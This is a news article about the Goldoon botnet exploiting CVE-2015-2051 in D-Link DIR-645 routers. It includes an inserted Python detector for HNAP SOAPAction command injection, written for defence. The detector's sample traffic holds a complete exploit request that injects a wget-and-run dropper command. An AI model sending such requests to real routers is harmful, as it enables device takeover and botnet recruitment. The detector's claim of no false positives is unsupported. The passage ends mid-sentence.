New Botnet ‘Goldoon’ Targets D-Link Devices


Endpoint Security, Governance & Risk Management, Internet of Things Security

FortiGuard Labs Identifies Botnet Exploiting Decade-Old D-Link Vulnerability

D-Link DIR-645 routers such as this one are being used in a new botnet. (Image: D-Link)

Hackers are taking advantage of D-Link home routers left unpatched for nearly a decade and turning them into a newly formed botnet that researchers have dubbed "Goldoon."


Researchers at FortiGuard Labs identified the botnet in April and found that the hackers assembling it are exploiting a 2015 vulnerability, tracked as CVE-2015-2051, in the D-Link DIR-645 router, a model that first retailed in 2011. D-Link patched the remote code execution flaw in 2015, but the devices that Goldoon is recruiting are still running firmware that predates the fix.

The vulnerability allows attackers to execute arbitrary commands remotely via the Home Network Administration Protocol, a proprietary management interface. Exploitation takes nothing more than a single HTTP request whose header carries a malicious command. HNAP is a SOAP-based protocol that Cisco acquired in 2008 with its purchase of Pure Networks; D-Link used it to let its setup wizard configure routers. A 2015 analysis by an independent researcher found that the router's HNAP web server skipped its authentication check when the request's SOAPAction header named the GetDeviceSettings action, and then passed the rest of the header value to the system shell without sanitizing it, so anything an attacker appended after the action name was executed as a command.
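The following detector is an added example, not code from the original article or from FortiGuard Labs. It parses raw HTTP requests, picks out the HNAP SOAPAction header, and flags a request when the GetDeviceSettings action is followed by shell metacharacters, which is the shape of the public 2015 proof of concept for CVE-2015-2051. The two sample requests, the hostnames and the IP addresses in them are constructed for the example; the extracted command string is whatever sat between the backticks, so a sensor built on this logic can log the attacker's payload as well as the hit.

```python
import re

# Characters that have no business inside an HNAP SOAPAction value. Anything
# containing them after the action name is treated as a command-injection attempt.
SHELL_META = re.compile(r"[`;|&$(){}<>\n]")

# SOAPAction values look like "http://purenetworks.com/HNAP1/<Action>"; the
# optional quotes are part of the header syntax. Everything after the action
# name is captured as `tail` so we can inspect it separately.
HNAP_ACTION = re.compile(
    r'^"?(?P<prefix>https?://purenetworks\.com/HNAP1/)'
    r"(?P<action>[A-Za-z0-9_]+)(?P<tail>.*?)\"?$"
)


def parse_request(raw: bytes) -> tuple[str, dict]:
    """Split a raw HTTP/1.x request into its request line and a lower-cased header dict."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        # Split on the first colon only: the SOAPAction value itself contains "http:".
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def classify_hnap_request(raw: bytes) -> dict:
    """Return {'hnap', 'action', 'injection'} for one raw request.

    'injection' is None for clean traffic, otherwise the shell command that was
    smuggled in after the action name (backticks and slashes stripped).
    """
    request_line, headers = parse_request(raw)
    verdict = {"hnap": False, "action": None, "injection": None}
    if "/HNAP1" not in request_line:
        return verdict
    verdict["hnap"] = True
    match = HNAP_ACTION.match(headers.get("soapaction", ""))
    if not match:
        return verdict
    verdict["action"] = match.group("action")
    tail = match.group("tail")
    if tail and SHELL_META.search(tail):
        verdict["injection"] = tail.strip("/").strip("`").strip()
    return verdict


# Constructed sample traffic (not captured data). 192.0.2.1 and 198.51.100.7 are
# documentation addresses; the dropper URL is made up for the example.
EXPLOIT_REQUEST = (
    b"POST /HNAP1/ HTTP/1.1\r\n"
    b"Host: 192.0.2.1\r\n"
    b"Content-Type: text/xml; charset=utf-8\r\n"
    b'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/'
    b'`cd /tmp; wget http://198.51.100.7/x.sh; sh x.sh`"\r\n'
    b"\r\n"
)

BENIGN_REQUEST = (
    b"POST /HNAP1/ HTTP/1.1\r\n"
    b"Host: 192.0.2.1\r\n"
    b"Content-Type: text/xml; charset=utf-8\r\n"
    b'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n'
    b"\r\n"
)

NON_HNAP_REQUEST = b"GET / HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"


def scan(requests: list[bytes]) -> list[dict]:
    """Classify a batch of raw requests; convenient for feeding a pcap extractor's output."""
    return [classify_hnap_request(r) for r in requests]


if __name__ == "__main__":
    for verdict in scan([EXPLOIT_REQUEST, BENIGN_REQUEST, NON_HNAP_REQUEST]):
        print(verdict)
```

The check deliberately keys on the tail after the action name rather than on a fixed payload string, because the dropper URL changes between campaigns while the injection mechanism does not. Legitimate HNAP clients never put shell metacharacters in SOAPAction, so the rule produces no false positives on normal setup-wizard traffic.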

Inconsistent patching of consumer-grade routers is a well-known problem that stems both from manufacturers' delays in developing updates and from consumers' neglect in installing them. A 2018 U.S. study based on internet scans of 186 routers found that 83% of the sampled routers…

Source…